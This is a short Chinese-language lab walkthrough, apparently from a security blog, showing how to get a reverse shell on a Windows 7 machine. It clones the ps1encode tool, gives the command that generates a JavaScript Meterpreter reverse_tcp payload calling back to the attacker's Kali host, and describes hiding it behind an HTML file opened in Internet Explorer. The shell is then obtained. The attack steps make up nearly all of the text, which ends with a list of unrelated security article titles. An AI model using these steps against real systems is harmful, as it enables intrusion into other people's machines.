1.环境 攻击机:Kali 192.168.42.138
靶机:Win7 192.168.42.139
2.安装工具ps1encode 【利用js文件反弹shell】下载地址:https://github.com/CroweCybersecurity/ps1encode
git clone https://github.com/CroweCybersecurity/ps1encode.git
文章图片
3. 利用js文件反弹shell 先利用ps1encode生成js payload
./ps1encode.rb --LHOST 192.168.42.138 --LPORT 1919 --PAYLOAD windows/meterpreter/reverse_tcp --ENCODE cmd -t js
文章图片
将payload复制到文件1.js中,直接执行js文件的话可能比较明显,所以写了一个1.html文件去远程调用js文件执行。
1.html文件内容如下:
文章图片
PS:由于在生成js payload时使用了windows/meterpreter/reverse_tcp模块,因此在设置监听时也需要设置该模块。
将1.html文件复制到靶机,使用ie浏览器打开
选择允许阻止的内容->你想允许这种交互吗(是)
文章图片
文章图片
查看靶机,获取shell成功,权限为当前用户权限
文章图片
推荐阅读
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
- CDN加速防御对文件下载视频直播网站起了什么作用()
- Java安全|Spring Cloud Gateway_CVE-2022-22947漏洞复现
- 从0到1学习Web安全|RCE代码及命令执行漏洞
- 渗透测试|spring_cloud_rce(CVE-2022-22947)漏洞复现
- 漏洞通报|CVE-2022-22947 SpringCloud Gateway 远程命令执行漏洞
- 安全|Spring Cloud 再爆高危漏洞.... 赶紧修复
- web安全|网络安全笔记
- 笔记|网络安全-安全服务工程师-技能手册详细总结(建议学习収藏)
- 安全|软考-中级-网络工程师-笔记-第3章-广域通信网